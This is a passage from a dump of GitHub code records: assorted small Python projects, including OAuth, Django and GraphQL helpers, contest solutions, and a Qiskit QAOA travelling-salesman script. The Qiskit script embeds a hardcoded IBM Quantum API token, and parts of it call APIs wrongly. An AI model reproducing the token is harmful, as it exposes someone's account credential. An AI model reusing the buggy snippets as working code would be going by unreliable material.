-3 plus 7 multiplied by -2?'))\n #print(answer('What is 52 cubed?'))\n #print(answer('What is 25 divided by 5?'))\n #print(answer('What is 3 plus 2 multiplied by 3?'))\n\n","repo_name":"itsanti/exercism","sub_path":"python/wordy/wordy.py","file_name":"wordy.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39861309353","text":"import os\r\nfrom dotenv import load_dotenv\r\nimport random \r\nimport hashlib\r\nimport requests\r\nimport pdb\r\nload_dotenv('../.env')\r\n\r\ngoogle_client_id = os.getenv('GOOGLE_CLIENT_ID')\r\ngoogle_client_secret = os.getenv('GOOGLE_CLIENT_SECRET')\r\n\r\nclass Authentication:\r\n def __init__(self):\r\n self.google_state = None\r\n pass\r\n\r\n def check(session):\r\n try:\r\n if session[\"logged_in\"] == None or session[\"logged_in\"] == False:\r\n return False\r\n else:\r\n return True\r\n except KeyError:\r\n return False\r\n\r\n def authGoogle():\r\n scope = ['https://www.googleapis.com/auth/userinfo.email', 'https://www.googleapis.com/auth/userinfo.profile']\r\n\r\n #generate random md5 string for state\r\n state = hashlib.md5(str(random.getrandbits(256)).encode('utf-8')).hexdigest()\r\n google_url = f'https://accounts.google.com/o/oauth2/v2/auth?scope={\"%20\".join(scope)}&redirect_uri=http://localhost:5000/auth/google/callback&response_type=code&client_id={google_client_id}&state={state}'\r\n \r\n return {\r\n 'google_url': google_url,\r\n 'state': state\r\n }\r\n\r\n def getGoogleToken(code):\r\n \"\"\"\r\n {\r\n \"access_token\": \"xxxxxxxxxxxxxxx\",\r\n \"expires_in\": 3920,\r\n \"token_type\": \"Bearer\",\r\n \"scope\": \"https://www.googleapis.com/auth/drive.metadata.readonly\",\r\n \"refresh_token\": \"xxxxxxxxxxxxxxxxxxxxx\"\r\n }\r\n \"\"\"\r\n \r\n \r\n data = {\r\n 'code': code,\r\n 'client_id': google_client_id,\r\n 'client_secret': google_client_secret,\r\n 'redirect_uri': 'http://localhost:5000/auth/google/callback',\r\n 'grant_type': 'authorization_code'\r\n }\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.post('https://oauth2.googleapis.com/token', data=data, headers=headers)\r\n return response.json()\r\n","repo_name":"viniciuspereiras/OAuth-playground","sub_path":"blueprints/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74544647554","text":"from user_drive_database import userVerification, createDatabaseConnections\nimport json\nimport os\n# [\n# {\"userLoggedIn\":\"boolean_value\", \"UserAccess\":\"access_level\"},\n# {\"name\":\"drive_name\", \"gameName\":\"game_name\", \"gameSize\":\"int(gameSize)\", \"sizeMetric\":\"gameSizeMetric\", \"gameTags\":\"[listOfTags]\",\"dateAdded\":\"mm/dd/yyyyy\",\"playTime\":\"YYYY:DD:HH:MM\"},\n# ['username','password','email','dir_to_drive_database','dir_to_game_database', int(acclev), int(randid)],\n# int(randID_sentByBrowser)\n# ]\n\ntableName = ''\n\ndef addGameToDB(information):\n verified = json.loads(userVerification(information))\n if int(verified[\"errorcode\"])==0:\n databaseConnections = createDatabaseConnections(information)\n gameInformation = list(information[1].values())\n matchingGameInformation = len(list(databaseConnections[1].execute(\"\"\"SELECT * FROM\"\"\")))\n\n\n#removeGameFromDB()\n#retrieveGamesFromDB()\n#addUpdateToGame()\n#removeUpdateFromGame()\n#retrieveAllInfoOnGameInDB()\n#addMath()\n#subMath()","repo_name":"goldeneye5671/Game-Tracker-Ultimate","sub_path":"Depreciated FIles/user_game_database.py","file_name":"user_game_database.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3724118291","text":"# Day 19\n\nimport pandas as pd\nimport mysql.connector\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"\",\n database=\"bestenlist\"\n)\nmycursor = mydb.cursor()\nmycursor.execute(\n \"CREATE TABLE employee (name VARCHAR(255), id INT,salary INT)\")\n\n# a.\nmycursor.execute(\"SELECT max(salary),min(salary) FROM employee\")\nmyresult = mycursor.fetchall()\nfor x in myresult:\n print(f\"Max Salary : {x[0]}, Min Salary : {x[1]}\")\n\n# b.\nmycursor.execute(\"SELECT count(id) FROM employee\")\nmyresult = mycursor.fetchall()\nfor x in myresult:\n print(\"Number of employees : \", x[0])\n\n\n# c.\nmycursor.execute(\"SELECT substring(e.name,1,3) FROM employee e\")\nmyresult = mycursor.fetchall()\nfor x in range(len(myresult)):\n print(myresult[x][0])\n","repo_name":"BenMeehan/BestEnlist","sub_path":"Day 20.py","file_name":"Day 20.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23606521671","text":"from numpy import *\nf = open('C-small-attempt0.in', 'r')\nd = open('c.out', 'w')\nc=int(f.readline())\nfor test in range(1,c+1):\n\tbuffer=0\n\tmoola=0\n\tcontroll=f.readline()\n\tgroups=f.readline()\n\tcontroll=controll.split()\n\tcontroll=map(int, controll) \n\tgroups=groups.split()\n\tqueu=map(int, groups) \n\tseat=list()\n\ttemp=0\n\tfor i in range(1,controll[0]+1):\n\t\tbuffer=0\n\t\twhile queu and queu[0]+buffer <= controll[1]:\n\t\t\tbuffer+=queu[0]\n\t\t\ttemp=queu.pop(0)\n\t\t\tseat.append(temp)\n\t\tfor x in seat:\n\t\t\tqueu.append(x)\t\n\t\tseat=[]\n\t\tmoola+=buffer\n\td.write ('Case #{0}: {1}\\n'.format(test,moola))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_55/800.py","file_name":"800.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12043225737","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom .models import Ingredient, Recipe\n# Create your views here.\n\n\ndef recipe_detail(request, pk):\n \"\"\" Полная информация по рецепту с пошаговой инструкцией \"\"\"\n recipe = get_object_or_404(Recipe, pk=pk)\n recipe.recipe_text = recipe.text.strip().split('\\n')\n return render(\n request,\n 'bookCook/recipe_detail.html',\n {'recipe': recipe}\n )\n\n\ndef home(request):\n \"\"\" Список рецептов с поиском по назвению и ингредиентам\"\"\"\n\n try:\n recipe_id = int(request.GET.get(\"recipe_id\"))\n except (ValueError, TypeError):\n recipe_id = None\n\n try:\n ingredient_id = int(request.GET.get(\"ingredient_id\"))\n except (ValueError, TypeError):\n ingredient_id = None\n\n query = Q()\n if recipe_id:\n query.add(\n Q(pk=recipe_id), Q.AND,\n )\n if ingredient_id:\n query.add(\n Q(ingredients__pk=ingredient_id), Q.AND,\n )\n\n recipes_object = Recipe.objects.prefetch_related(\"ingredients\").filter(query)\n recipes = Recipe.objects.all()\n ingredients = Ingredient.objects.all()\n\n\n return render(\n request,\n 'bookCook/recipes.html',\n {\n 'recipes': recipes_object,\n 'form': {\n 'description': \"Здесь вы можете ввести название рецепта или ингредиента\",\n 'ingredient': {\n 'name': 'Ингредиент',\n 'objects': ingredients,\n 'selected': ingredient_id,\n },\n 'recipe': {\n 'name': 'Название',\n 'objects': recipes,\n 'selected': recipe_id,\n },\n }\n }\n )\n","repo_name":"TaWerKa111/django-bookCook","sub_path":"app/bookCook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70113265476","text":"from datetime import date\nfrom ariadne import convert_kwargs_to_snake_case\nfrom api import db\nfrom api.models.user import User\nfrom modules.hash import hash_password\n\n\n@convert_kwargs_to_snake_case\ndef createUser_resolver(obj, info, username, password):\n try:\n prev_user = User.query.filter(User.username == username).scalar()\n if prev_user:\n payload = {\n \"success\": False,\n \"errors\": [\"username in use\"]\n }\n else:\n today = date.today()\n user = User(\n username=username,\n hash=hash_password(password),\n display_name='',\n created_at=today,\n post_ids=[]\n )\n db.session.add(user)\n db.session.commit()\n payload = {\n \"success\": True,\n \"user\": user.to_dict()\n }\n except ValueError:\n payload = {\n \"success\": False,\n \"errors\": [\"Invalid date\"]\n }\n return payload\n\n\n@convert_kwargs_to_snake_case\ndef updateUser_resolver(obj, info, id, username, display_name):\n try:\n user = User.query.get(id)\n if user:\n user.username = username\n user.display_name = display_name\n db.session.add(user)\n db.session.commit()\n payload = {\n \"success\": True,\n \"user\": user.to_dict()\n }\n except AttributeError as error:\n payload = {\n \"success\": False,\n \"errors\": [\"user not found\", str(error)]\n }\n return payload\n\n\n@convert_kwargs_to_snake_case\ndef deleteUser_resolver(obj, info, id):\n try:\n user = User.query.get(id)\n db.session.delete(user)\n db.session.commit()\n payload = {\"success\": True, \"user\": user.to_dict()}\n except AttributeError:\n payload = {\n \"success\": False,\n \"errors\": [\"user not found\"]\n }\n return payload\n","repo_name":"zrwaite/CredibleSource","sub_path":"server/api/mutations/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30649078800","text":"import xml.etree.ElementTree\nimport dbnormalizer.experiments.functionalDepExtractor as extract\nimport dbnormalizer.experiments.Normalization_algo as depMatrix\n\n\ndef table_names(file):\n relations = []\n database = xml.etree.ElementTree.parse('dbnormalizer/output/' + file).getroot()\n for a in database.iter('table'):\n primary = []\n attributes = []\n for x in a.iter('attribute'):\n attributes.append(x.attrib['attname'])\n if str(x.find('columnKey').text).lower() == 'pri':\n primary.append(x.attrib['attname'])\n relations.append([a.attrib['tbname'], attributes,primary])\n return relations\n\n\n# get the relevant dependencies from the list\ndef get_relevantDep(fds, primary):\n alldep = []\n for i, key in enumerate(primary):\n relevantfds = []\n print(\"table Name, \",key[0])\n for fd in fds:\n if [fds for fds in fd[0] if fds in key[2]] and len(fd[0]) <= len(key[1]):\n relevantfds.append(fd)\n print(\"fd\",fd)\n if [fds for fds in fd[0] if fds in key[1] and (fds not in relevantfds)]:\n relevantfds.append(fd)\n print(\"fd\", fd)\n alldep.append([key[0], key[2], relevantfds])\n return alldep\n\n\ndef normalize(dep, relation, database_name):\n sqlText = ''\n for i in range(len(relation)):\n\n fds = dep[i][2]\n rel = relation[i][1]\n\n # ind = v\n # print(\"Table Name,\", v[0])\n # print(\"functional dep\", d[2])\n # print(\"relation\", ind)\n # rel = ind[1]\n\n # fds = d[2]\n # print(\"fds\",fds)\n DM, determinents = depMatrix.dependencyMatrix(rel, fds)\n # print(\"DM\")\n # print(DM)\n\n DG = depMatrix.directedGraph(DM, determinents, rel)\n # print(\"DG\")\n # print(DG)\n\n DC = depMatrix.dependencyClosure(DM, DG, determinents, rel, fds)\n # print(DC)\n\n CDC = depMatrix.circularDependency(DM, DC)\n # print(\"CDC\")\n # print(CDC)\n\n\n sqlText += str(depMatrix.to3NF(CDC, rel, fds, database_name))\n\n return sqlText\n\ndef start_normalizer(file_name=\"example_scenario.txt\", xml_file=\"example.xml\", database_name=None):\n\n content = extract.readfile(file_name)\n x = extract.table_names(xml_file)\n s = extract.get_functionaldep(extract.extractor(content))\n\n fds = extract.restructure_keys(s, x)\n\n tables = table_names(xml_file)\n\n dependencies = get_relevantDep(fds, tables)\n\n return normalize(dependencies, tables, database_name)\n","repo_name":"amilacjay/isyntax","sub_path":"dbnormalizer/experiments/tableNormalizer.py","file_name":"tableNormalizer.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23542884341","text":"def foo(s, k, c):\r\n num = 0\r\n for i in range(len(s) - k):\r\n if s[i] != c:\r\n for j in range(i, i + k):\r\n s[j] = '+' if s[j] == '-' else '-'\r\n num += 1\r\n cc = s[-k]\r\n if cc != c:\r\n num += 1\r\n for i in range(-k, 0):\r\n if cc != s[i]:\r\n return -1\r\n return num\r\n\r\n\r\nf = open(\"QA.in\", \"r\")\r\nout = open(\"QA.out\", \"w\")\r\nn = int(f.readline())\r\nfor t in range(n):\r\n line = f.readline().split()\r\n s1, s2, k = list(line[0]), list(line[0]), int(line[1])\r\n p = foo(s1, k, '+')\r\n if p == -1:\r\n out.write(\"Case #\" + str(t + 1) + \": IMPOSSIBLE\\n\")\r\n else:\r\n out.write(\"Case #\" + str(t + 1) + \": \" + str(p) + \"\\n\")\r\nout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2251.py","file_name":"2251.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16079917749","text":"A = [3,4,3,2,3,-1,3,3]\n\ndef solution(A):\n # write your code in Python 3.6\n leader_index = -1\n if len(A) > 0:\n A_not_sorted = A.copy()\n A.sort() \n n = len(A)//2\n candidate = A[n]\n frequency = 0\n for i in range(len(A)):\n if A[i] == candidate:\n frequency += 1\n if frequency > n:\n leader_index = A_not_sorted.index(A[n])\n return leader_index\n\nprint(solution(A))\n","repo_name":"ymik0410/codility","sub_path":"dominator.py","file_name":"dominator.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70408634755","text":"# std\nimport unittest\n\n# internal\nfrom terraform_model.all import *\nfrom terraform_model.types.internal import TfUnknown\n\n\nclass TestTfRegex(unittest.TestCase):\n\n def test_tfregex_type(self):\n x = variable('x', type=TfString)\n result = tfregex('[a-z]+', x)\n self.assertIsInstance(result, TfUnknown)\n\n def test_tfregex_str(self):\n x = variable('x', type=TfString)\n result = str(tfregex('[a-z]+', x))\n self.assertEqual(result, 'regex(\"[a-z]+\", var.x)')\n","repo_name":"Mohadi3O/python-terraform-utils","sub_path":"packages/terraform_model/tests/test_functions/test_string/test_tfregex.py","file_name":"test_tfregex.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43401881910","text":"import pymongo\n\n_author_ = 'panong'\n\nuri = \"mongodb://Harry:Hogwarts4ever@192.142.32.100/gryffindor\"\nclient = pymongo.MongoClient(uri)\ndatabase = client['gryffindor']\ncollection = database['SortingHat']\n\n\ndef record():\n wizards = collection.find({})\n for person in wizards:\n print (\"Are you afraid of what you'll hear?\\nYour Animagus is a {}, {}\".format(person['Animagus'],person['Member']))\n\nrecord()\n\n","repo_name":"PatriciaAnong/Blog","sub_path":"Connect.py","file_name":"Connect.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"34760151933","text":"\nimport numpy as np\nimport torch as tr\nfrom torch.nn import Sequential, Conv2d, Linear, Flatten, ReLU, Tanh, Sigmoid\n\ndef TicTacToeNet1(board_size):\n model = Sequential(Flatten(),Linear(4*board_size**2, 2, True),Tanh(),Linear(2,1))\n return model\n \n\ndef calculate_loss(net, x, y_targ):\n y = net(x)\n e = tr.sum((y-y_targ)**2)\n return (y, e)\n \n\ndef optimization_step(optimizer, net, x, y_targ):\n optimizer.zero_grad()\n y, e = calculate_loss(net, x, y_targ)\n # print(\"Y:\\n\",y)\n e.backward()\n optimizer.step()\n return (y,e)\n \ndef helper(board_size):\n net = TicTacToeNet1(board_size=board_size)\n print(net)\n\n import pickle as pk\n with open(\"data1%d.pkl\" % board_size,\"rb\") as f: (x, y_targ) = pk.load(f)\n optimizer = tr.optim.Adam(net.parameters())\n print(optimizer)\n train_loss, test_loss = [], []\n shuffle = np.random.permutation(range(len(x)))\n split = 5\n train, test = shuffle[:-split], shuffle[-split:]\n \n for epoch in range(500):\n y_train, e_train = optimization_step(optimizer, net, x[train], y_targ[train])\n y_test, e_test = calculate_loss(net, x[test], y_targ[test])\n if epoch % 10 == 0: print(\"%d: %f (%f)\" % (epoch, e_train.item(), e_test.item()))\n train_loss.append(e_train.item() / (len(shuffle)-split))\n np.seterr(divide='ignore', invalid='ignore')\n test_loss.append(e_test.item() / split)\n \n tr.save(net.state_dict(), \"model%d.pth\" % board_size)\n \n \n\n \n\n","repo_name":"hemant717556/tictactoewithAI","sub_path":"tictactoe_net.py","file_name":"tictactoe_net.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70449344834","text":"#Bu kod kameraya gösterilen AprilTag'i detect edip çerçeve içine alıyor.\nimport cv2\nfrom apriltag import apriltag\nimport numpy as np\n\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n cap.set(cv2.CAP_PROP_FRAME_WIDTH,640); \n cap.set(cv2.CAP_PROP_FRAME_HEIGHT,640); \n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n detector = apriltag('tag36h11')\n results = detector.detect(frame)\n print(results)\n \n for r in results:\n\t# extract the bounding box (x, y)-coordinates for the AprilTag\n\t# and convert each of the (x, y)-coordinate pairs to integers\n (ptA, ptB, ptC, ptD) = r[\"lb-rb-rt-lt\"]\n ptB = (int(ptB[0]), int(ptB[1]))\n ptC = (int(ptC[0]), int(ptC[1]))\n ptD = (int(ptD[0]), int(ptD[1]))\n ptA = (int(ptA[0]), int(ptA[1]))\n\t# draw the bounding box of the AprilTag detection\n cv2.line(frame, ptA, ptB, (0, 255, 0), 2)\n cv2.line(frame, ptB, ptC, (0, 255, 0), 2)\n cv2.line(frame, ptC, ptD, (0, 255, 0), 2)\n cv2.line(frame, ptD, ptA, (0, 255, 0), 2)\n\t# draw the center (x, y)-coordinates of the AprilTag\n (cX, cY) = (int(r[\"center\"][0]), int(r[\"center\"][1]))\n cv2.circle(frame, (cX, cY), 5, (255, 255, 0), -1)\n\t# draw the tag family on the image\n \n \n\n # Display the resulting frame\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"fatmausalan/ApriltagExperiment","sub_path":"Code/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23553049851","text":"import sys\r\n\r\n\r\ndef tidy(number):\r\n rev_number = list(reversed(number))\r\n last_nine = -1\r\n for i, digit in enumerate(rev_number):\r\n if i < len(number)-1:\r\n digit1 = int(rev_number[i])\r\n digit2 = int(rev_number[i+1])\r\n if digit1 < digit2:\r\n last_nine = i\r\n #print(rev_number)\r\n rev_number[i+1] = str(digit2-1)\r\n #print(rev_number)\r\n #print(last_nine)\r\n for j in range(last_nine+1):\r\n rev_number[j] = \"9\"\r\n res = list(reversed(rev_number))\r\n #print(res)\r\n #print(''.join(res).lstrip(\"0\"))\r\n return int(''.join(res).lstrip(\"0\"))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n name = \"B-large\"\r\n f = open(\"{0}.in\".format(name))\r\n output = open(\"{0}.out\".format(name), \"w\")\r\n cases = int(f.readline())\r\n for i in range(cases):\r\n num = list(f.readline().strip())\r\n #print(num)\r\n output.write(\"Case #\" + str(i + 1) + \": \" + str(tidy(num)) + \"\\n\")\r\n f.close()\r\n output.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1584.py","file_name":"1584.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34290093395","text":"import cv2\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom zdl.utils.helper.opencv import countFrames\n\nfrom actionlabeller.model.AbcPlayable import AbcPlayable\nfrom actionlabeller.presenter import MySignals\nfrom actionlabeller.presenter.Settings import Settings\n\n\nclass Video(AbcPlayable):\n def __init__(self, fname):\n super().__init__()\n self.fname = fname\n self._cap = cv2.VideoCapture(self.fname)\n self._info = None\n self._indices = list(range(self.get_info()['frame_c']))\n # self.frames_buffer = queue.Queue(maxsize=100)\n\n def __del__(self):\n self._cap.release()\n\n def set_viewer(self, viewer):\n self.viewer = viewer\n return self\n\n def get_info(self):\n if self._info is None:\n cap = cv2.VideoCapture(self.fname)\n success, img = cap.read()\n fps = cap.get(cv2.CAP_PROP_FPS)\n frame_count = countFrames(cap=cap)\n duration = frame_count / fps\n self._info = {'fname': self.fname,\n 'frame_c': frame_count,\n 'duration': duration,\n 'shape': img.shape,\n 'width': img.shape[1],\n 'height': img.shape[0],\n 'channels': img.shape[2],\n 'fps': fps,\n 'Tms': 1000 / fps}\n return self._info\n\n @property\n def indices(self):\n return self._indices\n\n def to_head(self):\n self.schedule(0, -1, 0, self.__class__)\n\n def to_tail(self):\n tail = self.get_info()['frame_c'] - 1\n self.schedule(tail, -1, tail, self.__class__)\n\n def flush(self):\n if not self._flag_playing and self.scheduled.jump_to is None:\n return None\n if self.scheduled.stop_at:\n _interval = 1\n else:\n _interval = Settings.v_interval\n\n if self.scheduled.jump_to is not None:\n dest_index, self.scheduled.jump_to = self.scheduled.jump_to, None\n else:\n dest_index = self._flag_cur_index + _interval\n\n if self.scheduled.stop_at is not None and dest_index > self.scheduled.stop_at:\n self.scheduled.clear()\n self.pause()\n return None\n\n _gap = dest_index - self._flag_cur_index\n if _gap > 80 or _gap < 1:\n self._cap.set(cv2.CAP_PROP_POS_FRAMES, dest_index)\n _gap = 1\n while _gap:\n _gap -= 1\n ret, frame = self._cap.read()\n if not ret:\n self.schedule(0, -1, 0, MySignals.Emitter.V_PLAYER)\n return None\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # self.frames_buffer.append((self.cur_index, frame))\n height, width, bytesPerComponent = frame.shape\n bytesPerLine = bytesPerComponent * width\n q_image = QImage(frame.data, width, height, bytesPerLine,\n QImage.Format_RGB888).scaled(self.viewer.width(), self.viewer.height(),\n Qt.KeepAspectRatio, Qt.SmoothTransformation)\n q_pixmap = QPixmap.fromImage(q_image)\n self.viewer.setPixmap(q_pixmap)\n\n self._flag_cur_index = dest_index\n self.signals.flushed.emit(self._flag_cur_index)\n return self._flag_cur_index\n","repo_name":"ZDL-Git/ActionLabeller","sub_path":"actionlabeller/model/Video.py","file_name":"Video.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27727284187","text":"import time\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom docplex.mp.model import Model\nfrom qiskit_optimization.translators import from_docplex_mp\nfrom qiskit.utils import algorithm_globals, QuantumInstance\nfrom qiskit import Aer, execute, QuantumCircuit\nfrom qiskit.algorithms.minimum_eigensolvers import QAOA\nfrom qiskit_optimization.algorithms import MinimumEigenOptimizer\nfrom qiskit.algorithms.optimizers import COBYLA\n# from qiskit.primitives import Sampler\nfrom qiskit_optimization.converters.quadratic_program_to_qubo import QuadraticProgramToQubo\n\nfrom qiskit_ibm_runtime import Estimator, Sampler, Session\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# PREPARING THE TSP PROBLEM:\n\nn = 4 # establish the number of nodes for TSP\n\ncoordinates = np.random.default_rng(123).uniform(low=0, high=100, size=(n, 2))\n# create a random distribution of nodes in a grid (coordinates)\npos = dict()\nfor i, coordinate in enumerate(coordinates):\n pos[i] = (coordinate[0], coordinate[1])\n\nhigh = 100\nlow = 0\ngraph = nx.random_geometric_graph(n=n, radius=np.sqrt((high - low) ** 2 + (high - low) ** 2) + 1, pos=pos)\n\nfor w, v in graph.edges:\n delta = []\n for i in range(2):\n delta.append(graph.nodes[w][\"pos\"][i] - graph.nodes[v][\"pos\"][i])\n graph.edges[w, v][\"weight\"] = np.rint(np.sqrt(delta[0] ** 2 + delta[1] ** 2))\n\nindex = dict(zip(list(graph), range(n)))\nA = np.full((n, n), np.nan)\nfor u, wdict in graph.adjacency():\n for v, d in wdict.items():\n A[index[u], index[v]] = d.get(\"weight\", 1)\n\nA[np.isnan(A)] = 0.0\nA = np.asarray(A)\nM = np.asmatrix(A)\nprint(M)\n\n\n# defining the graph drawing fucntion\ndef draw_graph(G, colors, pos):\n default_axes = plt.axes(frameon=True)\n nx.draw_networkx(G, node_color=colors, node_size=600, alpha=.8, ax=default_axes, pos=pos)\n edge_labels = nx.get_edge_attributes(G, \"weight\")\n nx.draw_networkx_edge_labels(G, pos=pos, edge_labels=edge_labels)\n\n\ncolors = [\"r\" for node in graph.nodes]\npos = [graph.nodes[node][\"pos\"] for node in graph.nodes]\ndraw_graph(graph, colors, pos)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# DEFINING THE OPTIMIZATION PROBLEM (TSP):\n\nmdl = Model(name=\"TSP\") # establishing a model\n\n# defining the matrix tha connects the different nodes of the network\nx = dict()\nfor i in range(n):\n for j in range(n):\n x[(i, j)] = mdl.binary_var(name=\"x_{0}_{1}\".format(i, j))\n\n# defines the cost function being a product of all possible paths and the distances\nC_x = mdl.sum(\n M[i, j] * x[(i, k)] * x[(j, (k + 1) % n)]\n for i in range(n)\n for j in range(n)\n for k in range(n)\n if i != j\n)\n\n# establishes that the goal is to minimize the cost function\nmdl.minimize(C_x)\n\n# establishes the main constraint of the optimization problem, being that each node is visited once (first loop) and is\n# left once (second loop)\nfor i in range(n):\n mdl.add_constraint(mdl.sum(x[i, p] for p in range(n)) == 1)\nfor p in range(n):\n mdl.add_constraint(mdl.sum(x[i, p] for i in range(n)) == 1)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# TRANSFORMING THE QUADRATIC PROBLEM\n\n\nqp = from_docplex_mp(mdl) # transforms the quadratic problem into a qiskit optimization QUADRATIC PROBLEM\nqubo = QuadraticProgramToQubo().convert(problem=qp) # the quantum problem is now converted into a Quadratic\n# Unconstrained Binary Optimization problem so we can later apply Quantum Optimization Solvers\n\n\ndef route_x(x):\n # \"route_x\" is a special tool that will help us later! ;)\n # it searches a matrix of binary solutions to determine which nodes are joined in the solution and thus what is the\n # shortest route\n n = int(np.sqrt(len(x))) # determines the grid size by taking the root square of the x length\n route = [] # creates a route list\n for p in range(n): # iterates through the solution looking for the joined nodes and adding them to the list\n for i in range(n):\n if x[i * n + p]:\n route.append(i)\n\n return route\n\n\nalgorithm_globals.random_seed = 10598\n\ndef optimizer_call(qubo, session):\n\n qaoa_mes = QAOA(sampler=Sampler(session = session), optimizer=COBYLA(), )\n qaoa = MinimumEigenOptimizer(qaoa_mes)\n # qaoa_result = qaoa.solve(qubo)\n qaoa_result = qaoa.run(qubo, backend=backend)\n print(\"\\nQAOA:\\n\", qaoa_result)\n qaoa_result = np.asarray([int(y) for y in reversed(list(qaoa_result))])\n print(\"\\nRoute\\n\", route_x(qaoa_result))\n\n return\n\n\n# Quantum Instance creates a iteration of Qiskit Terra that stores the employed backend\n# quantum_instance = QuantumInstance(Aer.get_backend(\"qasm_simulator\"), seed_simulator=algorithm_globals.random_seed,\n# seed_transpiler=algorithm_globals.random_seed)\nbackend = Aer.get_backend('qasm_simulator')\n\nopt_start_time = time.time()\n\n\nsession = Session(backend=backend)\noptimizer_call(qubo=qubo, session=session)\n\nopt_end_time = time.time()\nexecution_time = opt_end_time - opt_start_time\nlogging.debug(\"optimizer execution time on sim: {:.2f} seconds\".format(execution_time))\n\n# ----------------------------------------------------------------------------------------------------------------------\n# TRYING ON A QUANTUM BACKEND\n\nfrom qiskit_ibm_runtime import QiskitRuntimeService\n\nIBM_API = \"a998d08dcbe837698586eebef6b0bd5f6edb78e05a74cdd944ace2636e41329ffa39585a8f923c4145d02caf3931e2fd9c9b788164a7d0097795289c931ef872\"\n\nservice = QiskitRuntimeService(token=IBM_API)\nbackend = service.least_bussy(simulator=True, operational=True, min_num_qubits=10)\n\nopt_start_time = time.time()\n\nsession = Session(backend=backend)\noptimizer_call(qubo=qubo, session=session)\n\nopt_end_time = time.time()\nexecution_time = opt_end_time - opt_start_time\nlogging.debug(\"optimizer execution time on backend: {:.2f} seconds\".format(execution_time))\n\n# opt_start_time = time.time()\n#\n# # Get the optimized circuit from the QAOA result\n# optimized_circuit = qaoa.get_optimal_circuit()\n# # optimized_circuit = qaoa_mes._ret['optimal_circuit']\n#\n# # Run the optimized circuit on the backend\n# job = execute(optimized_circuit, backend)\n# # Obtain the result of the job\n# result = job.result()\n# # Get the counts (measurement outcomes) from the result\n# counts = result.get_counts()\n#\n# opt_end_time = time.time()\n# execution_time = opt_end_time - opt_start_time\n#\n# # Print the measurement outcomes\n# print(counts)\n# print(\"Backend execution time: {:.2f} seconds\".format(execution_time))\n#\n","repo_name":"Quintanaaalberto/ciclab23","sub_path":"src/algorithms/tsp-medium.py","file_name":"tsp-medium.py","file_ext":"py","file_size_in_byte":6740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29175510253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 13 13:09:37 2019\r\n\r\n@author: Dan-L\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\ndef createAaTable():\r\n #aa = ['A','B','C','D']\r\n #weights = [1,3,5,6]\r\n aa = ['G','A','S','P','V','T','C','I','L','N','D','K','Q','E','M','H','F','R','Y','W']\r\n weights = 